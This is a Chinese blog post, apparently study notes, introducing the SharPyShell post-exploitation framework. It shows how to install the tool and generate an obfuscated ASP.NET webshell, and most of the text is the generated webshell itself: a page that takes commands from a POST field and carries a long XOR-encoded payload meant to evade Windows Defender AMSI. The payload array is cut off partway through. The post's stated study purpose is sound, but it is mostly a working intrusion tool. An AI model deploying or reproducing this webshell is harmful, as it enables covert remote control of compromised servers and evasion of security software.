> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码， 原文地址 [mp.weixin.qq.com](https://mp.weixin.qq.com/s/22DUmZUhrMLkAlUP5Sj6EQ)
| 

**声明：**该公众号大部分文章来自作者日常学习笔记，也有少部分文章是经过原作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。

请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

 |

  

**0x01 前言**

这篇文章中没有介绍其相关技术点的原理，也没有说明这个项目模块功能的应用场景，只是简单测试并记录了SharPyShell的使用方式，有实战经验的老哥肯定都知道在哪些场景中能用的上！

  

**0x02 SharPyShell简介**

SharPyShell v1.2.1发布了，它是一个由Python编写的后渗透框架，用于C＃Web应用程序的小型混淆版ASP.NET WebShell，但仅支持在.NET Framework >= 2.0上运行，执行由加密信道接收的命令，并在运行时将它们编译到内存中，而且部分功能还可以绕过Windows Defender AMSI引擎的检测，详情可在该项目中查看：

*   https://github.com/antonioCoco/SharPyShell
    

视频来源：作者推特@splinter_code

  

****0x03 SharPyShell安装****

这个项目必须运行在Python>=2.7，首先使用`git clone`命令将该项目克隆到本地，然后用`pip`命令安装所需依赖即可，不装依赖执行不了，在下个版本作者会将整个项目移植到Py3。

```
`1、克隆项目``git clone https://github.com/antonioCoco/SharPyShell.git``2、安装依赖``pip install -r requirements.txt`
```

![图片](data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==)

  

**0x04 SharPyShell使用**

```
`生成混淆的webshell（generate）;``模拟Windows终端作为webshell的交互（interact）；`
```

  

**生成Webshell：**

我们在使用前可以先用-h参数查看下所有参数和说明，主要的`-p`参数为Webshell连接密码，密文加密方式为：`sha256`，`-e`参数为通信加密方式，支持：`xor、aes128、aes256`，默认为：`xor`。

```
`python SharPyShell.py generate -h``python SharPyShell.py generate -p 'betasec'`
```

![图片](data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==)

```
`<%@ Import Namespace="System" %>``<%@ Import Namespace="System.Web" %>``<%@ Import Namespace="System.Reflection" %>``<script Language="c#" runat="server">``void Page_Load(object sender, EventArgs e)``{` `string p = "c58b9d11b2c9c4725d6521ee4cc74f71f120c7bf95e2a0bf8898c229aaf410c4";` `string r = Request.Form["data"];` `byte[] a = {0x2e,0x6f,0xa8,0x62,0x3a,0x64,0x31,0x31,0x66,0x32,0x63,0x39,0x9c,0xcb,0x37,0x32,0x8d,0x64,0x36,0x35,0x32,0x31,0x65,0x65,0x74,0x63,0x63,0x37,0x34,0x66,0x37,0x31,0x66,0x31,0x32,0x30,0x63,0x37,0x62,0x66,0x39,0x35,0x65,0x32,0x61,0x30,0x62,0x66,0x38,0x38,0x39,0x38,0x63,0x32,0x32,0x39,0x61,0x61,0x66,0x34,0xb1,0x30,0x63,0x34,0x6d,0x2a,0x82,0x6c,0x39,0xd0,0x38,0xfc,0x43,0x8a,0x62,0x75,0xae,0x15,0x63,0x5a,0x5c,0x17,0x16,0x45,0x40,0x5e,0x2,0x17,0x55,0xe,0x43,0x54,0x55,0x8,0x59,0x5e,0x12,0x11,0x50,0x55,0x43,0x45,0x17,0x8,0x19,0x5c,0xb,0x12,0x25,0x7f,0x31,0x46,0x55,0x57,0x5d,0x5d,0x4d,0x3f,0x3f,0x33,0x45,0x61,0x66,0x34,0x31,0x30,0x63,0x34,0x33,0x70,0x38,0x62,0x75,0x65,0x32,0x31,0x9e,0x7b,0x38,0x65,0x63,0x34,0x37,0x32,0x35,0x64,0x36,0x35,0xd2,0x31,0x6b,0x44,0x3f,0x62,0x6b,0x37,0x34,0x6c,0x37,0x31,0x66,0x37,0x32,0x30,0x63,0x37,0x62,0x66,0x47,0x1c,0x65,0x32,0x61,0x10,0x62,0x66,0x38,0x78,0x39,0x38,0x63,0x32,0x72,0x39,0x61,0x41,0x66,0x34,0x31,0x32,0x63,0x34,0x67,0x35,0x38,0x62,0x39,0x64,0x31,0x31,0x66,0x32,0x63,0x39,0x63,0x34,0x37,0x32,0x35,0xe4,0x36,0x35,0x32,0x33,0x65,0x65,0x34,0x63,0x63,0x37,0x37,0x66,0x77,0x34,0x66,0x31,0x22,0x30,0x63,0x27,0x62,0x66,0x39,0x35,0x75,0x32,0x61,0x20,0x62,0x66,0x38,0x38,0x39,0x38,0x73,0x32,0x32,0x39,0x61,0x61,0x66,0x34,0x31,0x30,0x63,0x34,0x53,0x1c,0x38,0x62,0x72,0x64,0x31,0x31,0x62,0x72,0x63,0x39,0xbb,0x36,0x37,0x32,0x35,0x64,0x36,0x35,0x32,0x31,0x65,0x65,0x34,0x63,0x63,0x37,0x34,0x66,0x37,0x31,0x66,0x51,0x32,0x30,0x6f,0x37,0x62,0x66,0x39,0x35,0x65,0x32,0x61,0x30,0x62,0x66,0x38,0x38,0x39,0x38,0x63,0x32,0x32,0x39,0x61,0x61,0x66,0x34,0x31,0x30,0x63,0x34,0x63,0x35,0x38,0x62,0x39,0x64,0x31,0x31,0x62,0x32,0x63,0x39,0x63,0x34,0x37,0x32,0x35,0x64,0x36,0x35,0x32,0x31,0x65,0x65,0x34,0x43,0x63,0x37,0x3c,0x66,0x37,0x31,0x66,0x31,0x32,0x30,0x63,0x37,0x62,0x66,0x31,0x15,0x65,0x32,0x29,0x30,0x62,0x66,0x38,0x38,0x39,0x38,0x63,0x32,0x32,0x39,0x4f,0x15,0x3,0x4c,0x45,0x30,0x63,0x34,0xe7,0x3c,0x38,0x62,0x39,0x44,0x31,0x31,0x62,0x38,0x63,0x39,0x63,0x36,0x37,0x32,0x35,0x64,0x36,0x35,0x32,0x31,0x65,0x65,0x34,0x63,0x63,0x37,0x14,0x66,0x37,0x51,0x48,0x43,0x41,0x42,0x0,0x37,0x62,0x66,0xe1,0x37,0x65,0x32,0x61,0x70,0x62,0x66,0x38,0x3c,0x39,0x38,0x63,0x3e,0x32,0x39,0x61,0x61,0x66,0x34,0x31,0x30,0x63,0x34,0x63,0x35,0x38,0x62,0x79,0x64,0x31,0x71,0x4c,0x40,0x6,0x55,0xc,0x57,0x37,0x32,0x39,0x64,0x36,0x35,0x32,0x51,0x65,0x65,0x34,0x61,0x63,0x37,0x34,0x76,0x37,0x31,0x66,0x31,0x32,0x30,0x63,0x37,0x62,0x66,0x39,0x35,0x65,0x32,0x21,0x30,0x62,0x24,0x38,0x38,0x39,0x38,0x63,0x32,0x32,0x39,0x61,0x61,0x66,0x34,0x31,0x30,0x63,0x34,0x3,0x1c,0x38,0x62,0x39,0x64,0x31,0x31,0x2a,0x32,0x63,0x39,0x61,0x34,0x32,0x32,0xd9,0x45,0x36,0x35,0x76,0x36,0x65,0x65,0x35,0x63,0x63,0x37,0x34,0x66,0x37,0x31,0x66,0x31,0x32,0x30,0x63,0x37,0x62,0x66,0x39,0x35,0x65,0x32,0x61,0x30,0x62,0x66,0x38,0x38,0x39,0x38,0x63,0x32,0x32,0x39,0x61,0x61,0x66,0x34,0x31,0x30,0x63,0x34,0x63,0x35,0x38,0x62,0x39,0x64,0x31,0x31,0x62,0x32,0x63,0x39,0x63,0x34,0x37,0x32,0x26,0x54,0x30,0x35,0x6,0x31,0x65,0x65,0x35,0x63,0x63,0x26,0x1c,0x65,0x37,0x31,0x6c,0x35,0x5d,0x34,0x63,0x37,0x68,0x6c,0x3a,0xbb,0xc,0xbf,0x64,0x30,0x62,0x67,0x33,0x2e,0x35,0x13,0x70,0x35,0x3a,0x3a,0x69,0xf0,0x60,0x3c,0x37,0xbe,0xa,0x69,0xf2,0x54,0xea,0xfe,0x31,0x73,0x69,0x3d,0x6a,0x31,0xed,0x50,0x51,0xd3,0x30,0x18,0x2e,0x54,0x33,0x35,0x4,0x30,0x65,0x65,0x36,0x63,0x63,0x26,0x46,0x67,0x37,0x31,0x16,0x3b,0x31,0x9,0x4b,0x36,0x62,0x66,0x3a,0x1d,0x60,0x32,0x61,0x3a,0x69,0x64,0x3f,0x3c,0x11,0x39,0x63,0x32,0x34,0x35,0x49,0x62,0x66,0x34,0x3b,0x38,0xc,0x32,0x63,0x35,0x32,0x6f,0x4a,0x63,0x31,0x31,0x68,0x21,0x67,0x2d,0x70,0x31,0x44,0x3a,0x35,0x64,0x3c,0x26,0x34,0x42,0x6c,0x65,0x34,0x69,0x70,0x30,0x25,0x61,0x20,0x5e,0x6c,0x31,0x32,0x3a,0x72,0x30,0x74,0x9,0x32,0x35,0x65,0x38,0x70,0x37,0xd,0x6a,0x38,0x38,0x33,0x4a,0x60,0x32,0x32,0x49,0xe,0x6c,0x66,0x34,0x3b,0x16,0x72,0x32,0x72,0x32,0x2f,0xef,0x33,0x64,0x31,0x30,0x71,0x3d,0x72,0x36,0x75,0x3d,0x95,0x23,0x3a,0xb,0x38,0x35,0x32,0x3b,0x76,0x60,0x25,0x66,0xc,0x38,0x34,0x66,0x3d,0x43,0x7f,0x31,0x32,0x40,0xc,0x27,0x62,0x66,0x33,0x26,0x6d,0x23,0x69,0x5f,0x73,0x66,0x38,0x32,0x4b,0x9,0x63,0x32,0x42,0x56,0x73,0x61,0x66,0x3e,0x22,0x39,0x72,0x3d,0x72,0x3d,0x2c,0xd,0x2a,0x64,0x31,0x3b,0x71,0x36,0xbd,0x51,0x70,0x3e,0x26,0x38,0x5a,0x70,0x36,0x35,0x38,0x43,0x2c,0x65,0x34,0x13,0x4b,0x22,0x34,0x66,0x3d,0x22,0x6d,0x27,0x21,0x3c,0x48,0x19,0x73,0x6d,0x2b,0x39,0x4d,0x24,0x61,0x30,0x68,0x14,0x43,0x38,0x39,0x48,0x72,0x37,0x5d,0x2e,0x61,0x61,0x6c,0x25,0x3d,0x5f,0x7b,0x34,0x63,0x3f,0x57,0x76,0x39,0x64,0x3b,0x19,0x7b,0x32,0x63,0x33,0x70,0x3f,0x26,0x3e,0x22,0x3c,0x25,0x39,0x23,0x3d,0x74,0x60,0x5b,0x74,0x63,0x37,0x3e,0x9,0x2d,0x31,0x66,0x3b,0x0,0xf2,0x4b,0x34,0x62,0x66,0x33,0x24,0x6e,0x5d,0x65,0x30,0x62,0x6c,0x2b,0x3c,0xe7,0x38,0x61,0x23,0x36,0x4d,0x60,0x61,0x66,0x2f,0x35,0x18,0x62,0x34,0x63,0x33,0x2b,0x6f,0x28,0x69,0x19,0x2a,0x62,0x32,0x69,0x2a,0x6d,0x25,0x39,0x38,0x33,0x4e,0x36,0x35,0x33,0x21,0x65,0x65,0x34,0x63,0x51,0x37,0x4a,0xd6,0x37,0x59,0x73,0x31,0x32,0x31,0x7d,0x35,0x4a,0x61,0x39,0x35,0x6f,0x18,0x23,0x63,0x28,0x24,0x39,0x38,0x38,0x38,0x63,0x32,0x32,0x39,0x6d,0x61,0x66,0x34,0x47,0x2,0x4d,0x4,0x4d,0x0,0x8,0x55,0xb,0x53,0x31,0x31,0x62,0x32,0x66,0x39,0xf,0x34,0x37,0x32,0x15,0x66,0x36,0x35,0x11,0x4f,0x65,0x65,0xb8,0x61,0x63,0x37,0x74,0x65,0x37,0x31,0x45,0x62,0x46,0x42,0xa,0x59,0x5,0x15,0x39,0x35,0x65,0x32,0xad,0x35,0x62,0x66,0xbc,0x38,0x39,0x38,0x40,0x67,0x61,0x39,0x31,0x67,0x66,0x34,0x21,0x30,0x63,0x34,0x40,0x72,0x6d,0x2b,0x7d,0x64,0x31,0x31,0x2,0x34,0x63,0x39,0x87,0x34,0x37,0x32,0x16,0x26,0x5a,0x5a,0x50,0x31,0x65,0x65,0x34,0x63,0x63,0x37,0x36,0x66,0x37,0x30,0x21,0x24,0x30,0x38,0x6a,0x37,0x62,0x66,0x39,0xcf,0x64,0x1,0x61,0x26,0x62,0x66,0x39,0x38,0x39,0x38,0x76,0x32,0x32,0x39,0x63,0x61,0x66,0x34,0x32,0x30,0x63,0x34,0x67,0x35,0x38,0x62,0x22,0x64,0x31,0x31,0x60,0x32,0x63,0x39,0x61,0x34,0x37,0x32,0x34,0x64,0x36,0x35,0x33,0x31,0x65,0x65,0x36,0x63,0x63,0x37,0x34,0x66,0x3d,0x31,0x67,0x31,0x32,0x30,0x63,0x37,0x64,0x66,0x3,0x35,0x56,0x32,0x67,0x30,0x15,0x66,0x6f,0x38,0x3f,0x38,0xf4,0x32,0x65,0x39,0x67,0x61,0x83,0x34,0xe8,0x30,0x65,0x34,0x63,0x34,0xb,0x62,0x3f,0x64,0x3b,0x30,0x51,0x32,0x69,0x39,0x5d,0x35,0x1a,0x33,0x3f,0x64,0x5f,0x34,0x63,0x30,0x6f,0x65,0xf3,0x62,0xcb,0x36,0x32,0x66,0xc2,0x30,0x55,0x31,0x38,0x30,0x9f,0x36,0x33,0x67,0x33,0x35,0x69,0x30,0x30,0x31,0x64,0x66,0x70,0x3a,0xf,0x3a,0x65,0x32,0x47,0x3b,0x52,0x61,0x60,0x34,0xb3,0x32,0x55,0x36,0x65,0x35,0xaf,0x60,0xf,0x66,0x37,0x31,0xdb,0x30,0x50,0x39,0x69,0x34,0x88,0x30,0x64,0x65,0x3c,0x35,0xd0,0x33,0x34,0x64,0x32,0x63,0x6f,0x34,0xcd,0x64,0x31,0x31,0x52,0x32,0x1,0x30,0x63,0x37,0x62,0x66,0x38,0x35,0x65,0x32,0x61,0x30,0x63,0x66,0x39,0x38,0x38,0x38,0x73,0x32,0x11,0x39,0x61,0x61,0x63,0x34,0x30,0x30,0x62,0x34,0x33,0x15,0x38,0x62,0x39,0x64,0xb0,0x31,0x23,0x32,0x69,0x39,0x62,0x34,0xa7,0x12,0x35,0x64,0x36,0x35,0xb4,0x31,0x28,0x65,0x26,0x63,0x60,0x37,0xd0,0x47,0x37,0x31,0x66,0x31,0xb4,0x28,0x32,0x37,0x7a,0x66,0x3c,0x35,0x65,0x32,0x60,0x30,0xa8,0x66,0x38,0x38,0x3b,0x38,0xb3,0x32,0x32,0x39,0x60,0x61,0x63,0x35,0x31,0x30,0x61,0x34,0xb3,0x35,0x29,0x62,0x68,0x64,0x2d,0x31,0x7b,0x32,0x32,0x39,0x7b,0x34,0x16,0x32,0xdb,0x64,0x17,0x35,0x13,0x31,0x92,0x65,0x12,0x63,0x52,0x37,0x26,0x67,0x3,0x31,0x47,0x31,0x11,0x31,0x59,0x37,0x6b,0x66,0x68,0x35,0x7d,0x32,0x58,0x30,0x33,0x66,0x20,0x38,0x78,0x38,0x32,0x32,0x2a,0x39,0x20,0x61,0x1a,0x35,0x71,0x30,0x22,0x34,0xf2,0x34,0x78,0x62,0x78,0x64,0xe9,0x30,0x27,0x32,0x2a,0x39,0x92,0x35,0x7d,0x32,0x6c,0x64,0x2a,0x37,0x7d,0x31,0x4,0x65,0x65,0x61,0x3b,0x37,0x5d,0x66,0x51,0x33,0x3b,0x31,0x3b,0x30,0x19,0x35,0x0,0x66,0x48,0x35,0xe8,0x30,0x6,0x30,0xe3,0x66,0x9a,0x3a,0x54,0x38,0x6a,0x32,0x9b,0x3b,0x15,0x61,0x37,0x34,0x83,0x32,0x1b,0x34,0xea,0x35,0x91,0x60,0x4d,0x64,0x50,0x31,0xb5,0x30,0x1d,0x39,0xf2,0x34,0xc7,0x30,0xb6,0x64,0x67,0x35,0x80,0x33,0xec,0x65,0x95,0x63,0x78,0x34,0xa5,0x66,0x6,0x31,0x43,0x32,0xaa,0x30,0x4d,0x37,0x69,0x66,0x83,0x35,0x4b,0x32,0x72,0x30,0xa1,0x66,0x14,0x38,0xa7,0x38,0xf6,0x32,0x36,0xb9,0x61,0x61,0x66,0x34,0x31,0x30,0x63,0x34,0x63,0x35,0x38,0x62,0x39,0x64,0x31,0x31,0xd7,0x32,0x63,0x39,0x61,0x34,0x37,0x32,0x35,0x64,0x36,0x35,0x32,0x31,0x65,0x65,0x35,0x63,0x49,0x37,0x34,0x66,0x37,0x31,0x64,0x31,0x32,0x30,0x63,0x37,0x62,0x66,0x39,0x35,0x65,0x32,0x60,0x30,0x51,0x66,0x38,0x38,0x39,0x38,0x63,0x32,0x32,0x39,0x61,0x5d,0x2b,0x5b,0x55,0x45,0xf,0x51,0x5d,0x35,0x4a,0x17,0x57,0x10,0x58,0x5c,0x7,0x6d,0x0,0x56,0xe,0x44,0x5e,0x5e,0x50,0x16,0x69,0x4d,0x5d,0x43,0x4b,0x1,0x58,0xf,0x63,0x64,0x5c,0x7,0x45,0x61,0x1f,0x31,0x5f,0x43,0x0,0x58,0x10,0xa,0x50,0x57,0x65,0x61,0x18,0x43,0x16,0x3,0x55,0x38,0x76,0x5a,0x9,0x57,0x51,0x4d,0x61,0x39,0x9,0x46,0x6e,0x75,0xd,0x57,0x3c,0x71,0x5d,0x1,0x39,0x36,0x44,0x5f,0x62,0x1c,0x0,0x4d,0xc,0x46,0x37,0x61,0x4c,0x17,0x42,0x50,0x5f,0x1f,0x37,0x10,0x5a,0x17,0xa,0x5a,0x51,0x48,0x74,0x5e,0xb,0x41,0x5b,0x5c,0x6,0x45,0x31,0x3,0x4b,0x43,0xc,0x51,0x4,0x43,0x62,0x25,0x57,0x55,0x49,0x51,0xf,0x53,0x46,0x50,0xe,0xf,0x34,0x51,0x5d,0x51,0x1b,0x55,0x17,0x5c,0x57,0xc,0x4a,0x25,0x45,0x45,0x10,0x5b,0x1,0x4c,0x17,0x51,0x37,0x60,0x40,0xa,0x42,0x5c,0x5f,0x54,0x26,0xa,0x59,0x13,0x2,0x43,0x5d,0x4,0x5e,0x5d,0xf,0x45,0x4b,0x71,0x17,0x43,0x10,0xf,0x5b,0x40,0x11,0x57,0x61,0x42,0x17,0x8,0x4c,0x51,0x54,0x5d,0x3c,0x51,0x5d,0x54,0x11,0x8,0xa,0x51,0x43,0x6f,0x1b,0x5b,0x11,0x35,0x51,0xc,0x49,0x11,0x45,0x31,0x12,0x53,0x10,0x4a,0x14,0x5b,0x45,0x56,0x35,0x37,0x4f,0x46,0x46,0x54,0x8,0x4b,0x60,0x6,0x1b,0x43,0x34,0x23,0x59,0x52,0x9,0x55,0x5b,0x5e,0x4,0x37,0x5,0x3,0x4d,0x6a,0x30,0x66,0x27,0x8,0x62,0x21,0x5d,0x4c,0x7b,0x41,0x17,0x57,0x41,0x39,0x23,0x18,0x12,0x51,0x31,0x53,0xc,0x50,0x6,0x35,0x7b,0xd,0x57,0x12,0x54,0x43,0x16,0x32,0x25,0x4b,0xc,0x59,0x75,0x53,0x46,0x1,0x0,0x1,0x61,0x45,0x17,0xc,0x5a,0x4,0x63,0x70,0x51,0x12,0x64,0x45,0x14,0x58,0x5c,0x57,0x63,0x7a,0xb,0x5,0x4b,0x5a,0x16,0x5d,0x7,0x44,0x4c,0x25,0x6b,0x50,0x58,0x4a,0x13,0x32,0x71,0x6a,0x9,0x0,0x14,0x44,0x72,0x5f,0x7,0x51,0x33,0x47,0x57,0x14,0x50,0x0,0x54,0x43,0x62,0x61,0x1a,0x4a,0x17,0x51,0x5a,0x1c,0x76,0xb,0x52,0x50,0x76,0x5e,0x8,0x4b,0x77,0xc,0xe,0x47,0x5d,0xa,0x52,0x43,0x66,0x72,0x5d,0x5d,0x13,0x5e,0xe,0x3,0x4b,0x65,0x4,0x40,0x0,0x5d,0x7,0x12,0x5d,0x4a,0x4a,0x38,0x10,0x57,0x46,0x66,0x26,0x4,0x8,0x51,0x43,0x51,0x17,0x51,0x2a,0x5b,0x75,0x7,0x54,0xb,0x43,0x48,0x62,0x41,0x6,0x4d,0x3c,0x73,0x52,0x5c,0x50,0x16,0x57,0x41,0x57,0x74,0x1d,0x0,0x57,0x16,0x17,0x56,0x56,0xa,0x52,0x31,0x35,0x48,0x41,0x44,0x6,0x5a,0x4c,0x25,0x56,0x59,0x9,0x57,0x2,0x44,0xb,0x9,0x56,0x4b,0x17,0x6b,0x13,0x57,0x51,0x50,0x0,0xd,0xf,0x4e,0x54,0x54,0x63,0x67,0x17,0x47,0x51,0xc,0x5e,0x27,0x5e,0x5d,0xe,0x57,0x0,0x4d,0xa,0x5b,0x59,0x32,0x52,0x1,0x42,0x6a,0x60,0x54,0x3,0x0,0x46,0x6,0xd,0x54,0x51,0x2,0x76,0x42,0x15,0x54,0x5f,0x52,0xf,0x5e,0x7,0x15,0x39,0x74,0x1,0x56,0x61,0x63,0x16,0x14,0x51,0x56,0x5e,0x38,0x20,0x5d,0x56,0x5c,0x25,0xe,0xb,0x64,0x43,0x5f,0x15,0x5d,0x7,0x50,0x4a,0x62,0x7a,0xb,0x5c,0x41,0xb,0x5e,0x6,0x4b,0x31,0x51,0x44,0x47,0x59,0x10,0x45,0x35,0x71,0x5e,0x8,0x15,0x5d,0xf,0x6,0x76,0x47,0x15,0x52,0x5c,0x4,0x5d,0x4b,0x76,0x11,0x58,0xf,0x35,0x56,0x40,0x17,0x51,0x4,0x30,0x31,0x1f,0x4b,0x4c,0x5c,0x55,0x4d,0x60,0x57,0x5f,0xd,0x4,0x5,0x40,0x58,0x5f,0xd,0x34,0x22,0x46,0x4b,0x7,0x54,0x6,0x5d,0x48,0x62,0x55,0x6,0x4d,0x3c,0x77,0x58,0x5f,0x45,0xd,0x5a,0x50,0x56,0x70,0x16,0x16,0x51,0xe,0x1,0x5b,0x4d,0x66,0x74,0x43,0x3,0x50,0x46,0x55,0x2a,0x59,0x11,0x12,0x58,0x5b,0x6,0x57,0x61,0x64,0x1b,0x16,0x5d,0x38,0x7e,0x5d,0x17,0x66,0x4b,0x49,0x4,0x61,0x2b,0x51,0x45,0x58,0xc,0x50,0x2a,0x5b,0x5e,0xd,0x39,0x23,0x54,0x45,0x2f,0x57,0x17,0x51,0xc,0x50,0x37,0x7f,0x50,0x10,0x5e,0x5a,0x56,0x73,0x4,0x16,0x51,0x63,0x2a,0x59,0x42,0x9,0x5c,0x54,0x66,0x65,0x5d,0x63,0x17,0x45,0xb,0x8,0x5e,0x35,0x26,0x5d,0xf,0x53,0x3,0x12,0x38,0x71,0x57,0x4c,0x50,0x0,0x32,0x7a,0xe,0xc,0x16,0x5d,0x5d,0x55,0x11,0x71,0x11,0x47,0x57,0x10,0x7a,0xb,0x5d,0x5d,0x7,0x51,0x17,0x50,0xc,0x5a,0x37,0x55,0x50,0x10,0x69,0x70,0x40,0x43,0xa,0x17,0x47,0x63,0x20,0x58,0x59,0x16,0x5e,0x5d,0x3,0x43,0x77,0x42,0x11,0x58,0x10,0x66,0x5e,0x50,0x11,0x6d,0x28,0x44,0x7,0xb,0x38,0x6b,0x40,0x4b,0x17,0x57,0x5f,0x17,0x22,0xe,0xa,0x58,0x54,0x53,0x17,0x5d,0xc,0x5b,0x4b,0x62,0x7a,0xb,0x5d,0x5d,0x7,0x51,0x17,0x50,0xc,0x5a,0x75,0x53,0x46,0x1,0x36,0x52,0x57,0x45,0x3a,0x26,0x5b,0x16,0xd,0x43,0x34,0x32,0x58,0x73,0x7,0x42,0x57,0x6,0x57,0x64,0x16,0x14,0x50,0x5b,0x2,0x32,0x24,0x48,0x1,0x3,0x48,0x4c,0x50,0x57,0xd,0x32,0x32,0x39,0x61,0x60,0x66,0x21,0x62,0x30,0x1a,0x34,0x10,0x35,0x4c,0x62,0x5c,0x64,0x5c,0x31,0x4c,0x32,0x7,0x39,0xf,0x34,0x5b,0x32,0x35,0x73,0x65,0x35,0x5a,0x31,0x4,0x65,0x46,0x63,0x33,0x37,0x4d,0x66,0x64,0x31,0xe,0x31,0x57,0x30,0xf,0x37,0xe,0x66,0x39,0x22,0x20,0x32,0x19,0x30,0x7,0x66,0x5b,0x38,0x6b,0x38,0x16,0x32,0x5c,0x39,0x15,0x61,0xf,0x34,0x5c,0x30,0x6,0x34,0x63,0x4,0x32,0x62,0x33,0x64,0x4a,0x31,0x19,0x32,0x18,0x39,0x30,0x34,0x5f,0x32,0x54,0x64,0x44,0x35,0x62,0x31,0x1c,0x65,0x67,0x63,0xb,0x37,0x51,0x66,0x5b,0x31,0xa,0x31,0x77,0x30,0x11,0x37,0x10,0x66,0x56,0x35,0x17,0x32,0x1c,0x30,0x1f,0x66,0x45,0x38,0x39,0x3d,0x59,0x32,0x12,0x39,0x61,0x61,0x66,0x34,0xdf,0x41,0xd1,0xc0,0xb2,0xbc,0x41,0x20,0x91,0xc9,0x9a,0x29,0xd9,0xab,0x8a,0xe5,0x63,0x3c,0x80,0x48,0x69,0x32,0x2f,0x1,0xd2,0xb8,0x62,0x45,0x36,0x7e,0x66,0x2a,0x31,0x68,0x32,0x11,0x64,0x3f,0x3c,0x3e,0x60,0x17,0x62,0x67,0x3d,0x15,0x64,0x33,0x69,0x34,0x62,0x66,0x2a,0x29,0x3c,0x18,0x62,0x2f,0x37,0x37,0x66,0x66,0x65,0x29,0x34,0x2d,0x66,0x3c,0x66,0x35,0x39,0x7f,0x3c,0x6a,0x34,0x11,0x63,0x3c,0x7e,0x3c,0x67,0x14,0x36,0x33,0x37,0x60,0x16,0x35,0x20,0x14,0x61,0x45,0x35,0x6b,0x6d,0x3f,0x14,0x64,0x25,0x0,0x74,0x10,0x2f,0x3e,0x67,0x17,0x62,0x74,0xc,0x31,0x45,0x33,0x7d,0x3e,0x66,0x46,0x38,0x2a,0x0,0x3d,0x43,0x33,0x20,0x4,0x6f,0x67,0x46,0x36,0x2d,0x2c,0x7e,0x28,0x60,0x15,0x38,0x6c,0x3c,0x64,0x33,0x3f,0x6c,0x3c,0x67,0x19,0x63,0x26,0x7e,0x37,0x15,0x65,0x24,0x78,0x3a,0x36,0x65,0x61,0x3a,0x6d,0x6d,0x39,0x3a,0x65,0x17,0x31,0x6e,0x33,0x2f,0x35,0x66,0x37,0x63,0x68,0x24,0x30,0x7e,0x35,0x71,0x3e,0x7f,0x63,0x25,0x3d,0x37,0x24,0x71,0x3,0x20,0x24,0x73,0x40,0x7a,0x26,0xc,0x22,0x36,0x3a,0x6b,0x28,0x3d,0x6c,0x24,0x6a,0x39,0x30,0x62,0x3a,0x63,0x39,0x63,0x34,0x37,0x2c,0x34,0x64,0x37,0x35,0x66,0x33,0x73,0x32,0x46,0x2,0x13,0x79,0x5b,0x8,0x72,0x49,0x5,0x54,0x42,0x44,0xa,0x58,0xc,0x32,0x51,0x47,0xa,0x45,0x12,0x31,0x62,0x66,0x60,0x11,0x39,0x38,0x63,0x32,0x32,0x39,0x61,0x61,0x66,0x34,0x5f,0x19,0x63,0x34,0x63,0x15,0x38,0x62,0x39,0x64,0x31,0x31,0x62,0x32,0x63,0x39,0x63,0x34,0x37,0x32,0x35,0x64,0x36,0x35,0x32,0x31,0x65,0x65,0x54,0x4a,0x63,0x37,0x34,0x66,0x37,0x31,0x66,0x31,0x6d,0x73,0xc,0x45,0x26,0xa,0x55,0x78,0x4,0x5b,0xf,0x30,0xf,0x15,0x5b,0x57,0x4b,0x5d,0x6,0x1c,0x56,0x55,0xd,0x61,0x66,0x34,0x31,0x30,0x9c,0x11,0x63,0x15,0x78,0x62,0x39,0x64,0x31,0x31,0x62,0x32,0x63,0x39,0x63,0x34,0x37,0x32,0x35,0x64,0x36,0x35,0x32,0x31,0x65,0x65,0x34,0x63,0x63,0x37,0x34,0x66,0x37,0x31,0x66,0x31,0x32,0x30,0x63,0x37,0x62,0x66,0x39,0x35,0x65,0x32,0x61,0x30,0x62,0x66,0x38,0x38,0x39,0x38,0x63,0x32,0x32,0x39,0x61,0x61,0x66,0x34,0x31,0x30,0x63,0x34,0x63,0x35,0x38,0x62,0x39,0x64,0x31,0x31,0x62,0x32,0x63,0x39,0x63,0x34,0x37,0x32,0x35,0x64,0x36,0x35,0x32,0x31,0x65,0x65,0x34,0x63,0x63,0x37,0x34,0x66,0x37,0x31,0x66,0x31,0x32,0x30,0x63,0x37,0x62,0x66,0x39,0x35,0x65,0x32,0x61,0x30,0x62,0x66,0x38,0x38,0x39,0x38,0x63,0x32,0x32,0x39,0x61,0x61,0x66,0x34,0x31,0x30,0x63,0x34,0x63,0x35,0x38,0x62,0x39,0x64,0x31,0x31,0x62,0x32,0x63,0x39,0x63,0x34,0x36,0x32,0x25,0x64,0x36,0x35,0x2a,0x31,0x65,0xe5,0x34,0x63,0x63,0x37,0x34,0x66,0x37,0x31,0x66,0x31,0x32,0x30,0x63,0x37,0x63,0x66,0x38,0x35,0x65,0x32,0x51,0x30,0x62,0xe6,0x38,0x38,0x39,0x38,0x63,0x32,0x32,0x39,0x61,0x61,0x66,0x34,0x31,0x30,0x62,0x34,0x63,0x35,0x38,0x62,0x71,0x64,0x31,0x31,0x3a,0x72,0x63,0x39,0x1f,0x36,0x37,0x32,0x35,0x64,0x36,0x35,0x32,0x31,0x65,0x65,0x48,0x61,0x57,0x37,0x34,0x66,0x61,0x31,0x35,0x31,0x6d,0x30,0x35,0x37,0x27,0x66,0x6b,0x35,0x36,0x32,0x28,0x30,0x2d,0x66,0x76,0x38,0x66,0x38,0x2a,0x32,0x7c,0x39,0x27,0x61,0x29,0x34,0x31,0x30,0x63,0x34,0xde,0x31,0xd7,0x9c,0x39,0x64,0x30,0x31,0x62,0x32,0x63,0x39,0x63,0x34,0x37,0x32,0x35,0x64,0x36,0x35,0x32,0x31,0x65,0x65,0xb,0x63,0x63,0x37,0x34,0x66,0x37,0x31,0x62,0x31,0x32,0x30,0x61,0x37,0x62,0x66,0x39,0x35,0x65,0x32,0x61,0x30,0x62,0x66,0x38,0x38,0x39,0x38,0x27,0x32,0x32,0x39,0x60,0x61,0x30,0x34,0x50,0x30,0x11,0x34,0x25,0x35,0x51,0x62,0x55,0x64,0x54,0x31,0x2b,0x32,0xd,0x39,0x5,0x34,0x58,0x32,0x35,0x64,0x36,0x35,0x16,0x31,0x61,0x65,0x34,0x63,0x37,0x37,0x46,0x6